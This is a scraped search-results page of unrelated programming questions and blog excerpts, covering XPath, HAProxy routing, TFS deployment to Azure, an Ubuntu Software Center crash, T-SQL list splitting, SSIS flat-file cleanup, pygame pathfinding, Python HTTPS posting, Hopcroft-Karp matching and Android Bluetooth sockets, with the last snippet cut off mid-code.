Search Results

Search found 1472 results on 59 pages for 'harry len'.

Page 49/59 | < Previous Page | 45 46 47 48 49 50 51 52 53 54 55 56  | Next Page >

  • XML Path needed

    - by user3696029
    I have the following XML file: <?xml version="1.0" encoding="UTF-8"?> <bookstore> <book category="COOKING"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="CHILDREN"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="WEB"> <title lang="en">XQuery Kick Start</title> <author>James McGovern</author> <author>Per Bothner</author> <author>Kurt Cagle</author> <author>James Linn</author> <author>Vaidyanathan Nagarajan</author> <year>2003</year> <price>49.99</price> </book> <book category="WEB"> <title lang="en">Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore> I need to write a XML path that returns a book published after 2003, category is children and I just need to display the author and title of the book? What is frustrating is that I have everything in the XPATH that wrote except I am missing the author.

    Read the article

  • How to divert traffic based on hostname using HAProxy?

    - by Bosky
    I've had some initial success with HAProxy setting up a bunch of app servers listening on various other ports. I now have another webserver listening on one port, and i'd like to what changes to make to my config to flow traffic by hostname as well. The following is the current setup, assuming: my apache webserver is running at examplecom:8001 my bunch of app servers 0.0.0.0:8081, 0.0.0.0:8082 , 0.0.0.0:8083 global log 127.0.0.1 local0 log 127.0.0.1 local1 notice maxconn 4096 debug #quiet #user haproxy #group haproxy defaults log global mode http option httplog option dontlognull retries 3 redispatch maxconn 2000 contimeout 5000 clitimeout 50000 srvtimeout 50000 listen appservers 0.0.0.0:80 mode http balance roundrobin option httpclose option forwardfor #option httpchk HEAD /check.txt HTTP/1.0 server inst1 0.0.0.0:8081 cookie server01 check inter 2000 fall 3 server inst2 0.0.0.0:8082 cookie server02 check inter 2000 fall 3 server inst3 0.0.0.0:8083 cookie server01 check inter 2000 fall 3 server inst4 0.0.0.0:8084 cookie server02 check inter 2000 fall 3 capture cookie vgnvisitor= len 32 (any other comments on the ^ setup are welcome.) Now I'd like to continue the same above, but in addition in case - if the hostname is myspecialtopleveldomain<dot>com, then would like to flow traffic to example<dot>com:8001 ~B

    Read the article

  • Advanced Continuous Delivery to Azure from TFS, Part 1: Good Enough Is Not Great

    - by jasont
    The folks over on the TFS / Visual Studio team have been working hard at releasing a steady stream of new features for their new hosted Team Foundation Service in the cloud. One of the most significant features released was simple continuous delivery of your solution into your Azure deployments. The original announcement from Brian Harry can be found here. Team Foundation Service is a great platform for .Net developers who are used to working with TFS on-premises. I’ve been using it since it became available at the //BUILD conference in 2011, and when I recently came to work at Stackify, it was one of the first changes I made. Managing work items is much easier than the tool we were using previously, although there are some limitations (more on that in another blog post). However, when continuous deployment was made available, it blew my mind. It was the killer feature I didn’t know I needed. Not to say that I wasn’t previously an advocate for continuous delivery; just that it was always a pain to set up and configure. Having it hosted - and a one-click setup – well, that’s just the best thing since sliced bread. It made perfect sense: my source code is in the cloud, and my deployment is in the cloud. Great! I can queue up a build from my iPad or phone and just let it go! I quickly tore through the quick setup and saw it all work… sort of. This will be the first in a three part series on how to take the building block of Team Foundation Service continuous delivery and build a CD model that will actually work for any team deploying something more advanced than a “Hello World” example. Part 1: Good Enough Is Not Great Part 2: A Model That Works: Branching and Multiple Deployment Environments Part 3: Other Considerations: SQL, Custom Tasks, Etc Good Enough Is Not Great There. I’ve said it. I certainly hope no one on the TFS team is offended, but it’s the truth. Let’s take a look under the hood and understand how it works, and then why it’s not enough to handle real world CD as-is. How it works. (note that I’ve skipped a couple of steps; I already have my accounts set up and something deployed to Azure) The first step is to establish some oAuth magic between your Azure management portal and your TFS Instance. You do this via the management portal. Once it’s done, you have a new build process template in your TFS instance. (Image lifted from the documentation) From here, you’ll get the usual prompts for security, allowing access, etc. But you’ll also get to pick which Solution in your source control to build. Here’s what the bulk of the build definition looks like. All I’ve had to do is add in the solution to build (notice that mine is from a specific branch – Release – more on that later) and I’ve changed the configuration. I trigger the build, and voila! I have an Azure deployment a few minutes later. The beauty of this is that it’s all in the cloud and I’m not waiting for my machine to compile and upload the package. (I also had to enable the build definition first – by default it is created in disabled state, probably a good thing since it will trigger on every.single.checkin by default.) I get to see a history of deployments from the Azure portal, and can link into TFS to see the associated changesets and work items. You’ll notice also that this build definition also automatically put my code in the Staging slot of my Azure deployment – more on this soon. For now, I can VIP swap and be in production. (P.S. I hate VIP swap and “production” and “staging” in Azure. More on that later too.) That’s it. That’s the default out-of-box experience. Easy, right? But it’s full of room for improvement, so let’s get into that….   The Problems Nothing is perfect (except my code – it’s always perfect), and neither is Continuous Deployment without a bit of work to help it fit your dev team’s process. So what are the issues? Issue 1: Staging vs QA vs Prod vs whatever other environments your team may have. This, for me, is the big hairy one. Remember how this automatically deployed to staging rather than prod for us? There are a couple of issues with this model: If I want to deliver to prod, it requires intervention on my part after deployment (via a VIP swap). If I truly want to promote between environments (i.e. Nightly Build –> Stable QA –> Production) I likely have configuration changes between each environment such as database connection strings and this process (and the VIP swap) doesn’t account for this. Yet. Issue 2: Branching and delivering on every check-in. As I mentioned above, I have set this up to target a specific branch – Release – of my code. For the purposes of this example, I have adopted the “basic” branching strategy as defined by the ALM Rangers. This basically establishes a “Main” trunk where you branch off Dev and Release branches. Granted, the Release branch is usually the only thing you will deploy to production, but you certainly don’t want to roll to production automatically when you merge to the Release branch and check-in (unless you like the thrill of it, and in that case, I like your style, cowboy….). Rather, you have nightly build and QA environments, or if you’ve adopted the feature-branch model you have environments for those. Those are the environments you want to continuously deploy to. But that takes us back to Issue 1: we currently have a 1:1 solution to Azure deployment target. Issue 3: SQL and other custom tasks. Let’s be honest and address the elephant in the room: I need to get some sleep because I see an elephant in the room. But seriously, I can’t think of an application I have touched in the last 10 years that doesn’t need to consider SQL changes when deploying code and upgrading an environment. Microsoft seems perfectly content to ignore this elephant for now: yes, they’ve added Data Tier Applications. But let’s be honest with ourselves again: no one really uses it, and it’s not suitable for anything more complex than a Hello World sample project database. Why? Because it doesn’t fit well into a great source control story. Developers make stored procedure and table changes all day long while coding complex applications, and if someone forgets to go update the DACPAC before the automated deployment, you have a broken build until it’s completed. Developers – not just DBAs – also like to work with SQL in SQL tools, not in Visual Studio. I’m really picking on SQL because that’s generally the biggest concern that I hear. But we need to account for any custom tasks as well in the build process.   The Solutions… ? We’ve taken a look at how this all works, and addressed the shortcomings. In my next post (which I promise will be very, very soon), I will detail how I’ve overcome these shortcomings and used this foundation to create a mature, flexible model for deploying my app – any version, any time, to any environment.

    Read the article

  • How to fix Software Center crashes?

    - by shandna towns
    E: Type '<!DOCTYPE' is not known on line 1 in source list /etc/apt/sources.list.d/medibuntu.list E: The list of sources could not be read. shandanatowns@ubuntu:~$ software-center 2012-09-25 12:23:35,115 - softwarecenter.ui.gtk3.app - INFO - setting up proxy 'None' 2012-09-25 12:23:35,123 - softwarecenter.db.database - INFO - open() database: path=None use_axi=True use_agent=True (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:34:20: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:34:22: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:56:20: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:56:22: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:60:20: Not using units is deprecated. Assuming 'px'. (software-center:4524): Gtk-WARNING **: Theme parsing error: softwarecenter.css:60:22: Not using units is deprecated. Assuming 'px'. 2012-09-25 12:23:35,472 - softwarecenter.backend.reviews - WARNING - Could not get usefulness from server, no username in config file 2012-09-25 12:23:35,477 - softwarecenter.fixme - WARNING - logs to the root logger: '('/usr/lib/python2.7/dist-packages/gi/importer.py', 51, 'find_module')' 2012-09-25 12:23:35,477 - root - ERROR - Could not find any typelib for LaunchpadIntegration 2012-09-25 12:23:35,605 - softwarecenter.ui.gtk3.app - INFO - show_available_packages: search_text is '', app is None. 2012-09-25 12:23:35,987 - softwarecenter.db.pkginfo_impl.aptcache - INFO - aptcache.open() Traceback (most recent call last): File "/usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py", line 257, in open self._cache = apt.Cache(progress) File "/usr/lib/python2.7/dist-packages/apt/cache.py", line 102, in __init__ self.open(progress) File "/usr/lib/python2.7/dist-packages/apt/cache.py", line 149, in open self._list.read_main_list() SystemError: E:Type '<!DOCTYPE' is not known on line 1 in source list /etc/apt/sources.list.d/medibuntu.list 2012-09-25 12:23:37,000 - softwarecenter.db.enquire - ERROR - _get_estimate_nr_apps_and_nr_pkgs failed Traceback (most recent call last): File "/usr/share/software-center/softwarecenter/db/enquire.py", line 115, in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset(0, len(self.db), None, xfilter) File "/usr/share/software-center/softwarecenter/db/appfilter.py", line 89, in __call__ if (not pkgname in self.cache and File "/usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py", line 277, in __contains__ return self._cache.__contains__(k) AttributeError: 'NoneType' object has no attribute '__contains__' Traceback (most recent call last): File "/usr/bin/software-center", line 182, in <module> app.run(args) File "/usr/share/software-center/softwarecenter/ui/gtk3/app.py", line 1385, in run self.show_available_packages(args) File "/usr/share/software-center/softwarecenter/ui/gtk3/app.py", line 1323, in show_available_packages self.view_manager.set_active_view(ViewPages.AVAILABLE) File "/usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py", line 151, in set_active_view view_widget.init_view() File "/usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py", line 173, in init_view self.cache, self.db, self.icons, self.apps_filter) File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 81, in __init__ self.build() File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 322, in build self._build_homepage_view() File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 120, in _build_homepage_view self._append_whats_new() File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 251, in _append_whats_new whats_new_cat = self._update_whats_new_content() File "/usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py", line 236, in _update_whats_new_content docs = whats_new_cat.get_documents(self.db) File "/usr/share/software-center/softwarecenter/db/categories.py", line 132, in get_documents nonblocking_load=False) File "/usr/share/software-center/softwarecenter/db/enquire.py", line 317, in set_query self._blocking_perform_search() File "/usr/share/software-center/softwarecenter/db/enquire.py", line 212, in _blocking_perform_search matches = enquire.get_mset(0, self.limit, None, xfilter) File "/usr/share/software-center/softwarecenter/db/appfilter.py", line 89, in __call__ if (not pkgname in self.cache and File "/usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py", line 277, in __contains__ return self._cache.__contains__(k) AttributeError: 'NoneType' object has no attribute '__contains__'

    Read the article

  • How to use a list of values in Excel as filter in a query

    - by Luca Zavarella
    It often happens that a customer provides us with a list of items for which to extract certain information. Imagine, for example, that our clients wish to have the header information of the sales orders only for certain orders. Most likely he will give us a list of items in a column in Excel, or, less probably, a simple text file with the identification code:     As long as the given values ??are at best a dozen, it costs us nothing to copy and paste those values ??in our SSMS and place them in a WHERE clause, using the IN operator, making sure to include the quotes in the case of alphanumeric elements (the database sample is AdventureWorks2008R2): SELECT * FROM Sales.SalesOrderHeader AS SOH WHERE SOH.SalesOrderNumber IN ( 'SO43667' ,'SO43709' ,'SO43726' ,'SO43746' ,'SO43782' ,'SO43796') Clearly, the need to add commas and quotes becomes an hassle when dealing with hundreds of items (which of course has happened to us!). It’d be comfortable to do a simple copy and paste, leaving the items as they are pasted, and make sure the query works fine. We can have this commodity via a User Defined Function, that returns items in a table. Simply we’ll provide the function with an input string parameter containing the pasted items. I give you directly the T-SQL code, where comments are there to clarify what was written: CREATE FUNCTION [dbo].[SplitCRLFList] (@List VARCHAR(MAX)) RETURNS @ParsedList TABLE ( --< Set the item length as your needs Item VARCHAR(255) ) AS BEGIN DECLARE --< Set the item length as your needs @Item VARCHAR(255) ,@Pos BIGINT --< Trim TABs due to indentations SET @List = REPLACE(@List, CHAR(9), '') --< Trim leading and trailing spaces, then add a CR\LF at the end of the list SET @List = LTRIM(RTRIM(@List)) + CHAR(13) + CHAR(10) --< Set the position at the first CR/LF in the list SET @Pos = CHARINDEX(CHAR(13) + CHAR(10), @List, 1) --< If exist other chars other than CR/LFs in the list then... IF REPLACE(@List, CHAR(13) + CHAR(10), '') <> '' BEGIN --< Loop while CR/LFs are over (not found = CHARINDEX returns 0) WHILE @Pos > 0 BEGIN --< Get the heading list chars from the first char to the first CR/LF and trim spaces SET @Item = LTRIM(RTRIM(LEFT(@List, @Pos - 1))) --< If the so calulated item is not empty... IF @Item <> '' BEGIN --< ...insert it in the @ParsedList temporary table INSERT INTO @ParsedList (Item) VALUES (@Item) --(CAST(@Item AS int)) --< Use the appropriate conversion if needed END --< Remove the first item from the list... SET @List = RIGHT(@List, LEN(@List) - @Pos - 1) --< ...and set the position to the next CR/LF SET @Pos = CHARINDEX(CHAR(13) + CHAR(10), @List, 1) --< Repeat this block while the upon loop condition is verified END END RETURN END At this point, having created the UDF, our query is transformed trivially in: SELECT * FROM Sales.SalesOrderHeader AS SOH WHERE SOH.SalesOrderNumber IN ( SELECT Item FROM SplitCRLFList('SO43667 SO43709 SO43726 SO43746 SO43782 SO43796') AS SCL) Convenient, isn’t it? You can find the script DBA_SplitCRLFList.sql here. Bye!!

    Read the article

  • SSIS Technique to Remove/Skip Trailer and/or Bad Data Row in a Flat File

    - by Compudicted
    I noticed that the question on how to skip or bypass a trailer record or a badly formatted/empty row in a SSIS package keeps coming back on the MSDN SSIS Forum. I tried to figure out the reason why and after an extensive search inside the forum and outside it on the entire Web (using several search engines) I indeed found that it seems even thought there is a number of posts and articles on the topic none of them are employing the simplest and the most efficient technique. When I say efficient I mean the shortest time to solution for the fellow developers. OK, enough talk. Let’s face the problem: Typically a flat file (e.g. a comma delimited/CSV) needs to be processed (loaded into a database in most cases really). Oftentimes, such an input file is produced by some sort of an out of control, 3-rd party solution and would come in with some garbage characters and/or even malformed/miss-formatted rows. One such example could be this imaginary file: As you can see several rows have no data and there is an occasional garbage character (1, in this example on row #7). Our task is to produce a clean file that will only capture the meaningful data rows. As an aside, our output/target may be a database table, but for the purpose of this exercise we will simply re-format the source. Let’s outline our course of action to start off: Will use SSIS 2005 to create a DFT; The DFT will use a Flat File Source to our input [bad] flat file; We will use a Conditional Split to process the bad input file; and finally Dump the resulting data to a new [clean] file. Well, only four steps, let’s see if it is too much of work. 1: Start the BIDS and add a DFT to the Control Flow designer (I named it Process Dirty File DFT): 2, and 3: I had added the data viewer to just see what I am getting, alas, surprisingly the data issues were not seen it:   What really is the key in the approach it is to properly set the Conditional Split Transformation. Visually it is: and specifically its SSIS Expression LEN([After CS Column 0]) > 1 The point is to employ the right Boolean expression (yes, the Conditional Split accepts only Boolean conditions). For the sake of this post I re-named the Output Name “No Empty Rows”, but by default it will be named Case 1 (remember to drag your first column into the expression area)! You can close your Conditional Split now. The next part will be crucial – consuming the output of our Conditional Split. Last step - #4: Add a Flat File Destination or any other one you need. Click on the Conditional Split and choose the green arrow to drop onto the target. When you do so make sure you choose the No Empty Rows output and NOT the Conditional Split Default Output. Make the necessary mappings. At this point your package must look like: As the last step will run our package to examine the produced output file. F5: and… it looks great!

    Read the article

  • what is the best way to use loops to detect events while the main loop is running?

    - by yao jiang
    I am making an "game" that has pathfinding using pygame. I am using Astar algo. I have a main loop which draws the whole map. In the loop I check for events. If user press "enter" or "space", random start and end are selected, then animation starts and it will try to get from start to end. My draw function is stupid as hell right now, it works as expected but I feel that I am doing it wrong. It'll draw everything to the end of the animation. I am also detecting events in there as well. What is a better way of implementing the draw function such that it will draw one "step" at a time while checking for events? animating = False; while loop: check events: if not animating: # space or enter press will choose random start/end coords if enter_pressed or space_pressed: start, end = choose_coords route = find_route(start, end) draw(start, end, grid, route) else: # left click == generate an event to block the path # right click == user can choose a new destination if left_mouse_click: gen_event() reroute() elif right_mouse_click: new_end = new_end() new_start = current_pos() route = find_route(new_start, new_end) draw(new_start, new_end, grid, route) # draw out the grid def draw(start, end, grid, route_coord): # draw the end coords color = red; pick_image(screen, color, width*end[1],height*end[0]); pygame.display.flip(); # then draw the rest of the route for i in range(len(route_coord)): # pausing because we want animation time.sleep(speed); # get the x/y coords x,y = route_coord[i]; event_on = False; if grid[x][y] == 2: color = green; elif grid[x][y] == 3: color = blue; for event in pygame.event.get(): if event.type == pygame.MOUSEBUTTONDOWN: if event.button == 3: print "destination change detected, rerouting"; # get mouse position, px coords pos = pygame.mouse.get_pos(); # get grid coord c = pos[0] // width; r = pos[1] // height; grid[r][c] = 4; end = [r, c]; elif event.button == 1: print "user generated event"; pos = pygame.mouse.get_pos(); # get grid coord c = pos[0] // width; r = pos[1] // height; # mark it as a block for now grid[r][c] = 1; event_on = True; if check_events([x,y]) or event_on: # there is an event # mark it as a block for now grid[y][x] = 1; pick_image(screen, event_x, width*y, height*x); pygame.display.flip(); # then find a new route new_start = route_coord[i-1]; marked_grid, route_coord = find_route(new_start, end, grid); draw(new_start, end, grid, route_coord); return; # just end draw here so it wont throw the "index out of range" error elif grid[x][y] == 4: color = red; pick_image(screen, color, width*y, height*x); pygame.display.flip(); # clear route coord list, otherwise itll just add more unwanted coords route_coord_list[:] = [];

    Read the article

  • python unhashable type - posting xml data

    - by eterry28
    First, I'm not a python programmer. I'm an old C dog that's learned new Java and PHP tricks, but python looks like a pretty cool language. I'm getting an error that I can't quite follow. The error follows the code below. import httplib, urllib url = "pdb-services-beta.nipr.com" xml = '<?xml version="1.0"?><!DOCTYPE SCB_Request SYSTEM "http://www.nipr.com/html/SCB_XML_Request.dtd"><SCB_Request Request_Type="Create_Report"><SCB_Login_Data CustomerID="someuser" Passwd="somepass" /><SCB_Create_Report_Request Title=""><Producer_List><NIPR_Num_List_XML><NIPR_Num NIPR_Num="8980608" /><NIPR_Num NIPR_Num="7597855" /><NIPR_Num NIPR_Num="10166016" /></NIPR_Num_List_XML></Producer_List></SCB_Create_Report_Request></SCB_Request>' params = {} params['xmldata'] = xml headers = {} headers['Content-type'] = 'text/xml' headers['Accept'] = '*/*' headers['Content-Length'] = "%d" % len(xml) connection = httplib.HTTPSConnection(url) connection.set_debuglevel(1) connection.request("POST", "/pdb-xml-reports/scb_xmlclient.cgi", params, headers) response = connection.getresponse() print response.status, response.reason data = response.read() print data connection.close Here's the error: Traceback (most recent call last): File "C:\Python27\tutorial.py", line 14, in connection.request("POST", "/pdb-xml-reports/scb_xmlclient.cgi", params, headers) File "C:\Python27\lib\httplib.py", line 958, in request self._send_request(method, url, body, headers) File "C:\Python27\lib\httplib.py", line 992, in _send_request self.endheaders(body) File "C:\Python27\lib\httplib.py", line 954, in endheaders self._send_output(message_body) File "C:\Python27\lib\httplib.py", line 818, in _send_output self.send(message_body) File "C:\Python27\lib\httplib.py", line 790, in send self.sock.sendall(data) File "C:\Python27\lib\ssl.py", line 229, in sendall v = self.send(data[count:]) TypeError: unhashable type My log file says that the xmldata parameter is empty. Any ideas?

    Read the article

  • Hopcroft–Karp algorithm in Python

    - by Simon
    I am trying to implement the Hopcroft Karp algorithm in Python using networkx as graph representation. Currently I am as far as this: #Algorithms for bipartite graphs import networkx as nx import collections class HopcroftKarp(object): INFINITY = -1 def __init__(self, G): self.G = G def match(self): self.N1, self.N2 = self.partition() self.pair = {} self.dist = {} self.q = collections.deque() #init for v in self.G: self.pair[v] = None self.dist[v] = HopcroftKarp.INFINITY matching = 0 while self.bfs(): for v in self.N1: if self.pair[v] and self.dfs(v): matching = matching + 1 return matching def dfs(self, v): if v != None: for u in self.G.neighbors_iter(v): if self.dist[ self.pair[u] ] == self.dist[v] + 1 and self.dfs(self.pair[u]): self.pair[u] = v self.pair[v] = u return True self.dist[v] = HopcroftKarp.INFINITY return False return True def bfs(self): for v in self.N1: if self.pair[v] == None: self.dist[v] = 0 self.q.append(v) else: self.dist[v] = HopcroftKarp.INFINITY self.dist[None] = HopcroftKarp.INFINITY while len(self.q) > 0: v = self.q.pop() if v != None: for u in self.G.neighbors_iter(v): if self.dist[ self.pair[u] ] == HopcroftKarp.INFINITY: self.dist[ self.pair[u] ] = self.dist[v] + 1 self.q.append(self.pair[u]) return self.dist[None] != HopcroftKarp.INFINITY def partition(self): return nx.bipartite_sets(self.G) The algorithm is taken from http://en.wikipedia.org/wiki/Hopcroft%E2%80%93Karp_algorithm However it does not work. I use the following test code G = nx.Graph([ (1,"a"), (1,"c"), (2,"a"), (2,"b"), (3,"a"), (3,"c"), (4,"d"), (4,"e"),(4,"f"),(4,"g"), (5,"b"), (5,"c"), (6,"c"), (6,"d") ]) matching = HopcroftKarp(G).match() print matching Unfortunately this does not work, I end up in an endless loop :(. Can someone spot the error, I am out of ideas and I must admit that I have not yet fully understand the algorithm, so it is mostly an implementation of the pseudo code on wikipedia

    Read the article

  • SPP Socket createRfcommSocketToServiceRecord will not connect

    - by philDev
    Hello, I want to use Android 2.1 to connect to an external Bluetooth device, wich is offering an SPP port to me. In this case it is an external GPS unit. When I'm trying to connect I can't connect an established socket while being in the "client" mode. Then if I try to set up a socket (being in the server role), to RECEIVE text from my PC everything works just fine. The Computer can connect as the client to the Socket on the Phone via SPP using the SSP UUID or some random UUID. So the Problem is not that I'm using the wrong UUID. But the other way around (e.g. calling connect on the established client socket) createRfcommSocketToServiceRecord(UUID uuid)) just doesn't work. Sadly I don't have the time to inspect the problem further. It would be greate If somebody could point me the right way. In the following part of the Logfile has to be the Problem. Greets PhilDev P.S. I'm going to be present during the Office hours. Here the log file: 03-21 03:10:52.020: DEBUG/BluetoothSocket.cpp(4643): initSocketFromFdNative 03-21 03:10:52.025: DEBUG/BluetoothSocket(4643): connect 03-21 03:10:52.025: DEBUG/BluetoothSocket(4643): doSdp 03-21 03:10:52.050: DEBUG/ADAPTER(2132): create_device(01:00:00:7F:B5:B3) 03-21 03:10:52.050: DEBUG/ADAPTER(2132): adapter_create_device(01:00:00:7F:B5:B3) 03-21 03:10:52.055: DEBUG/DEVICE(2132): Creating device [address = 01:00:00:7F:B5:B3] /org/bluez/2132/hci0/dev_01_00_00_7F_B5_B3 [name = ] 03-21 03:10:52.055: DEBUG/DEVICE(2132): btd_device_ref(0x10c18): ref=1 03-21 03:10:52.065: INFO/BluetoothEventLoop.cpp(1914): event_filter: Received signal org.bluez.Adapter:DeviceCreated from /org/bluez/2132/hci0 03-21 03:10:52.065: INFO/BluetoothService.cpp(1914): ... Object Path = /org/bluez/2132/hci0/dev_01_00_00_7F_B5_B3 03-21 03:10:52.065: INFO/BluetoothService.cpp(1914): ... Pattern = 00001101-0000-1000-8000-00805f9b34fb, strlen = 36 03-21 03:10:52.070: DEBUG/DEVICE(2132): *************DiscoverServices******** 03-21 03:10:52.070: INFO/DTUN_HCID(2132): dtun_client_get_remote_svc_channel: starting discovery on (uuid16=0x0011) 03-21 03:10:52.070: INFO/DTUN_HCID(2132): bdaddr=01:00:00:7F:B5:B3 03-21 03:10:52.070: INFO/DTUN_CLNT(2132): Client calling DTUN_METHOD_DM_GET_REMOTE_SERVICE_CHANNEL (id 4) 03-21 03:10:52.070: INFO/(2106): DTUN_ReceiveCtrlMsg: [DTUN] Received message [BTLIF_DTUN_METHOD_CALL] 4354 03-21 03:10:52.070: INFO/(2106): handle_method_call: handle_method_call :: received DTUN_METHOD_DM_GET_REMOTE_SERVICE_CHANNEL (id 4), len 134 03-21 03:10:52.075: ERROR/BTLD(2106): ****************search UUID = 1101*********** 03-21 03:10:52.075: INFO//system/bin/btld(2103): btapp_dm_GetRemoteServiceChannel() 03-21 03:10:52.120: DEBUG/BluetoothService(1914): updateDeviceServiceChannelCache(01:00:00:7F:B5:B3) 03-21 03:10:52.120: DEBUG/BluetoothEventLoop(1914): ClassValue: null for remote device: 01:00:00:7F:B5:B3 is null 03-21 03:10:52.120: INFO/BluetoothEventLoop.cpp(1914): event_filter: Received signal org.bluez.Adapter:PropertyChanged from /org/bluez/2132/hci0 03-21 03:10:52.305: WARN/BTLD(2106): bta_dm_check_av:0 03-21 03:10:56.395: DEBUG/WifiService(1914): ACTION_BATTERY_CHANGED pluggedType: 2 03-21 03:10:57.440: WARN/BTLD(2106): SDP - Rcvd conn cnf with error: 0x4 CID 0x43 03-21 03:10:57.440: INFO/BTL-IFS(2106): send_ctrl_msg: [BTL_IFS CTRL] send BTLIF_DTUN_SIGNAL_EVT (CTRL) 13 pbytes (hdl 10) 03-21 03:10:57.445: INFO/DTUN_CLNT(2132): dtun-rx signal [DTUN_SIG_DM_RMT_SERVICE_CHANNEL] (id 42) len 15 03-21 03:10:57.445: INFO/DTUN_HCID(2132): dtun_dm_sig_rmt_service_channel: success=1, service=00000000 03-21 03:10:57.445: ERROR/DTUN_HCID(2132): discovery unsuccessful! package de.phil_dev.android.BT; import java.io.BufferedInputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.util.UUID; import android.app.Activity; import android.bluetooth.BluetoothAdapter; import android.bluetooth.BluetoothClass; import android.bluetooth.BluetoothDevice; import android.bluetooth.BluetoothServerSocket; import android.bluetooth.BluetoothSocket; import android.content.Intent; import android.os.Bundle; import android.util.Log; import android.widget.Toast; public class ThinBTClient extends Activity { private static final String TAG = "THINBTCLIENT"; private static final boolean D = true; private BluetoothAdapter mBluetoothAdapter = null; private BluetoothSocket btSocket = null; private BufferedInputStream inStream = null; private BluetoothServerSocket myServerSocket; private ConnectThread myConnection; private ServerThread myServer; // Well known SPP UUID (will *probably* map to // RFCOMM channel 1 (default) if not in use); // see comments in onResume(). private static final UUID MY_UUID = UUID .fromString("00001101-0000-1000-8000-00805F9B34FB"); // .fromString("94f39d29-7d6d-437d-973b-fba39e49d4ee"); // ==> hardcode your slaves MAC address here <== // PC // private static String address = "00:09:DD:50:86:A0"; // GPS private static String address = "00:0B:0D:8E:D4:33"; /** Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); if (D) Log.e(TAG, "+++ ON CREATE +++"); mBluetoothAdapter = BluetoothAdapter.getDefaultAdapter(); if (mBluetoothAdapter == null) { Toast.makeText(this, "Bluetooth is not available.", Toast.LENGTH_LONG).show(); finish(); return; } if (!mBluetoothAdapter.isEnabled()) { Toast.makeText(this, "Please enable your BT and re-run this program.", Toast.LENGTH_LONG).show(); finish(); return; } if (D) Log.e(TAG, "+++ DONE IN ON CREATE, GOT LOCAL BT ADAPTER +++"); } @Override public void onStart() { super.onStart(); if (D) Log.e(TAG, "++ ON START ++"); } @Override public void onResume() { super.onResume(); if (D) { Log.e(TAG, "+ ON RESUME +"); Log.e(TAG, "+ ABOUT TO ATTEMPT CLIENT CONNECT +"); } // Make the phone discoverable // When this returns, it will 'know' about the server, // via it's MAC address. // mBluetoothAdapter.startDiscovery(); BluetoothDevice device = mBluetoothAdapter.getRemoteDevice(address); Log.e(TAG, device.getName() + " connected"); // myServer = new ServerThread(); // myServer.start(); myConnection = new ConnectThread(device); myConnection.start(); } @Override public void onPause() { super.onPause(); if (D) Log.e(TAG, "- ON PAUSE -"); try { btSocket.close(); } catch (IOException e2) { Log.e(TAG, "ON PAUSE: Unable to close socket.", e2); } } @Override public void onStop() { super.onStop(); if (D) Log.e(TAG, "-- ON STOP --"); } @Override public void onDestroy() { super.onDestroy(); if (D) Log.e(TAG, "--- ON DESTROY ---"); } private class ServerThread extends Thread { private final BluetoothServerSocket myServSocket; public ServerThread() { BluetoothServerSocket tmp = null; // create listening socket try { tmp = mBluetoothAdapter .listenUsingRfcommWithServiceRecord( "myServer", MY_UUID); } catch (IOException e) { Log.e(TAG, "Server establishing failed"); } myServSocket = tmp; } public void run() { Log.e(TAG, "Beginn waiting for connection"); BluetoothSocket connectSocket = null; InputStream inStream = null; byte[] buffer = new byte[1024]; int bytes; while (true) { try { connectSocket = myServSocket.accept(); } catch (IOException e) { Log.e(TAG, "Connection failed"); break; } Log.e(TAG, "ALL THE WAY AROUND"); try { connectSocket = connectSocket.getRemoteDevice() .createRfcommSocketToServiceRecord(MY_UUID); connectSocket.connect(); } catch (IOException e1) { Log.e(TAG, "DIDNT WORK"); } // handle Connection try { inStream = connectSocket.getInputStream(); while (true) { try { bytes = inStream.read(buffer); Log.e(TAG, "Received: " + buffer.toString()); } catch (IOException e3) { Log.e(TAG, "disconnected"); break; } } } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); break; } } } void cancel() { } } private class ConnectThread extends Thread { private final BluetoothSocket mySocket; private final BluetoothDevice myDevice; public ConnectThread(BluetoothDevice device) { myDevice = device; BluetoothSocket tmp = null; try { tmp = device.createRfcommSocketToServiceRecord(MY_UUID); } catch (IOException e) { Log.e(TAG, "CONNECTION IN THREAD DIDNT WORK"); } mySocket = tmp; } public void run() { Log.e(TAG, "STARTING TO CONNECT THE SOCKET"); setName("My Connection Thread"); InputStream inStream = null; boolean run = false; //mBluetoothAdapter.cancelDiscovery(); try { mySocket.connect(); run = true; } catch (IOException e) { run = false; Log.e(TAG, this.getName() + ": CONN DIDNT WORK, Try closing socket"); try { mySocket.close(); } catch (IOException e1) { Log.e(TAG, this.getName() + ": COULD CLOSE SOCKET", e1); this.destroy(); } } synchronized (ThinBTClient.this) { myConnection = null; } byte[] buffer = new byte[1024]; int bytes; // handle Connection try { inStream = mySocket.getInputStream(); while (run) { try { bytes = inStream.read(buffer); Log.e(TAG, "Received: " + buffer.toString()); } catch (IOException e3) { Log.e(TAG, "disconnected"); } } } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); } // starting connected thread (handling there in 